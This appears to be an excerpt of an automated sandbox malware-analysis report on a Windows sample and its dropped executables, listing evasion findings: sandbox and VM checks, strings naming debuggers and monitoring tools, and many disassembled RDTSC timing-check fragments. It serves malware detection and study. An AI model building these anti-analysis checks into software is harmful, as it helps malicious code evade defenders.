                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Found API chain indicative of sandbox detection
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12683
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9743
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSystem information queried: FirmwareTableInformation
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                          Source: 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDAG.EXE
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                          Source: Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 239EAF second address: 239EB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A036 second address: 23A043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A043 second address: 23A05F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A05F second address: 23A069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23A1CB second address: 23A1FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Ch 0x00000007 jmp 00007FB3E1482E8Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FB3E1482E90h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DDA3 second address: 23DDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB3E0C7B69Dh 0x00000010 mov eax, dword ptr [eax] 0x00000012 jl 00007FB3E0C7B6A2h 0x00000018 ja 00007FB3E0C7B69Ch 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 ja 00007FB3E0C7B696h 0x0000002b jmp 00007FB3E0C7B6A6h 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DEF7 second address: 23DEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DEFB second address: 23DEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DEFF second address: 23DF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DF05 second address: 23DF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23DF0B second address: 23DF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E01F second address: 23E029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB3E0C7B696h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E029 second address: 23E07A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D2B9Ah] 0x0000000f push 00000003h 0x00000011 mov dx, bx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FB3E1482E88h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dl, 39h 0x00000032 push 00000003h 0x00000034 mov esi, dword ptr [ebp+122D2D19h] 0x0000003a push AA35DB78h 0x0000003f jo 00007FB3E1482E90h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E104 second address: 23E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E108 second address: 23E164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FB3E1482E92h 0x0000000d nop 0x0000000e jnc 00007FB3E1482E8Bh 0x00000014 sbb edx, 50582981h 0x0000001a push 00000000h 0x0000001c movzx esi, dx 0x0000001f call 00007FB3E1482E89h 0x00000024 jmp 00007FB3E1482E8Fh 0x00000029 push eax 0x0000002a js 00007FB3E1482E8Ah 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E164 second address: 23E182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB3E0C7B696h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E182 second address: 23E194 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3E1482E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E194 second address: 23E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23E199 second address: 23E227 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB3E1482E94h 0x00000008 jmp 00007FB3E1482E8Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 je 00007FB3E1482E88h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f jmp 00007FB3E1482E8Dh 0x00000024 popad 0x00000025 popad 0x00000026 pop eax 0x00000027 sub si, 4B0Ah 0x0000002c push 00000003h 0x0000002e pushad 0x0000002f movsx edi, cx 0x00000032 popad 0x00000033 mov dword ptr [ebp+122D1CDCh], ebx 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D1CDCh], eax 0x00000041 push 00000003h 0x00000043 call 00007FB3E1482E97h 0x00000048 jmp 00007FB3E1482E90h 0x0000004d pop edx 0x0000004e call 00007FB3E1482E89h 0x00000053 pushad 0x00000054 jo 00007FB3E1482E8Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25EA3A second address: 25EA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D0BD second address: 25D0C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D208 second address: 25D218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B69Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22CD24 second address: 22CD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E1E3 second address: 25E1E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E605 second address: 25E622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2531B2 second address: 2531B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2531B8 second address: 2531DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FB3E1482E86h 0x00000012 jo 00007FB3E1482E86h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26982C second address: 269840 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB3E0C7B69Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007FB3E0C7B696h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269840 second address: 269846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26998C second address: 269992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269992 second address: 269999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269999 second address: 2699C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007FB3E0C7B696h 0x0000000c popad 0x0000000d pushad 0x0000000e jbe 00007FB3E0C7B696h 0x00000014 jmp 00007FB3E0C7B6A8h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E0D second address: 269E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A0AE second address: 26A0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A0B4 second address: 26A0BE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3E1482E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A874 second address: 26A87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A911 second address: 26A91B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB3E1482E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A91B second address: 26A921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A921 second address: 26A925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A925 second address: 26A929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A929 second address: 26A950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 70CB67B6h 0x0000000f xor esi, 68770CA7h 0x00000015 call 00007FB3E1482E89h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jp 00007FB3E1482E86h 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A950 second address: 26A95F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A95F second address: 26A964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AD90 second address: 26AD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AD94 second address: 26ADCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007FB3E1482E92h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB3E1482E98h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AEAB second address: 26AEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B682 second address: 26B6EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3E1482E8Ch 0x00000008 jo 00007FB3E1482E86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB3E1482E98h 0x0000001a popad 0x0000001b pop ebx 0x0000001c xchg eax, ebx 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FB3E1482E88h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 pushad 0x00000038 mov edi, eax 0x0000003a mov dword ptr [ebp+122D230Fh], eax 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB3E1482E90h 0x00000049 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26BC50 second address: 26BC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C1C1 second address: 26C242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FB3E1482E92h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB3E1482E88h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1E1Ah], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FB3E1482E88h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D2C06h] 0x00000052 clc 0x00000053 pushad 0x00000054 jbe 00007FB3E1482E8Ch 0x0000005a mov dword ptr [ebp+1246139Dh], ebx 0x00000060 clc 0x00000061 popad 0x00000062 xchg eax, ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 pop edx 0x00000069 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26CD11 second address: 26CD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jp 00007FB3E0C7B69Ch 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB3E0C7B698h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b call 00007FB3E0C7B69Ah 0x00000030 and esi, 6D6DA807h 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FB3E0C7B6A4h 0x0000003e jmp 00007FB3E0C7B6A0h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26CD84 second address: 26CD88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26CD88 second address: 26CD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26CD8E second address: 26CD98 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3E1482E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26DEFA second address: 26DF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26DF00 second address: 26DF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26DF06 second address: 26DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E8AE second address: 26E8C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
